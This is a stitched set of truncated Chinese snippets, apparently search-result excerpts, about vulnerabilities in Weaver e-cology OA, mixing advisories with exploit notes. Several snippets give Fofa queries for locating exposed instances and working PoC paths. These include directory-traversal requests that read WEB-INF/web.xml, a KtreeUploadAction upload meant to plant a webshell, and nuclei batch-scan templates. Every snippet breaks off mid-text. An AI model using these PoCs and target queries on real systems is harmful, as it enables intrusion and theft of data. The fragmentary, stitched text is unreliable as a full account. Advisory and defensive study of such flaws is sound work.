泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。 漏洞描述 Weaver e-cology OAAction.jsp文件存在文件上传漏洞。 Fofa (header="testBanCookie"||banner="testBanCookie"||body="/wui/common/css/w7OVFont.css"||(body="type...
漏洞描述 E-cology易受Springframework本地文件包含漏洞 漏洞复现 fofa语法:app="泛微-协同办公OA" 登录页面如下: POC:/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml nuclei批量yaml文件 id:ecology-springframework-directory-traversalinfo:name:EcologySpringframework-LocalFileInclu...
泛微OA E-Cology KtreeUploadAction 存在文件上传漏洞,攻击者可通过漏洞上传webshell,达到控制web服务器的权限 fofa app="泛微-协同商务系统" poc POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; ...
漏洞简介 泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。 影响版本 Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0 漏洞复现 fofa查询语法:app="泛微-协同办...
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。 漏洞信息 漏洞名称泛微OA E-cology 远程代码执行漏洞 CVE编号 - CNVD编号 CNVD-2019-322...
近日,腾讯云安全中心监测发现办公协作系统泛微e-cology OA被曝存在数据库配置信息泄露漏洞,如攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。 为避免您的业务受影响,腾讯云安全中心建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。同时建议云上租户免费开...
泛微E-COLOGY SQL注入漏洞通告 绿盟科技NSFOCUS 一、漏洞概述 近日,绿盟科技CERT监测发现国内安全厂商公开披露了一个泛微Ecology OA SQL注入漏洞。由于Ecology OA对用户输入内容的验证存在缺陷。未经身份验证的远程攻击者通过向目标系统发送特制的字符串,最终可实现获取目标数据库中的敏感信息。请受影响的用户尽快采取措施进...
1. 漏洞背景 泛微OA e-cology是一套企业协同管理平台,包含多种功能模块。/mobile/plugin/checkserver.jsp是该系统中用于处理某些特定请求的文件。由于对用户输入的数据过滤处理不当,该文件存在SQL注入漏洞,攻击者可以利用此漏洞执行任意SQL指令,从而窃取数据库中的敏感信息。 2. SQL注入原理 SQL注入是一种攻击技术,...
19 changes: 19 additions & 0 deletions 19 泛微OA-E-Cology-FileDownload文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,19 @@ ## 泛微OA-E-Cology-FileDownload文件读取漏洞 ## fofa ``` app="泛微-OA(e-cology)" ``` ## poc ``` GET /weaver/ln...
漏洞复现 fofa查询语法:app="泛微-协同办公OA" 鹰图查询语法:app.name="泛微 e-cology 9.0 OA" 登录页面如下: POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml nuclei批量yaml文件 id:ecology-filedownload-directory-traversalinfo:name:Ecology-LocalFileInclusionauthor:princechaddhaseverity:high...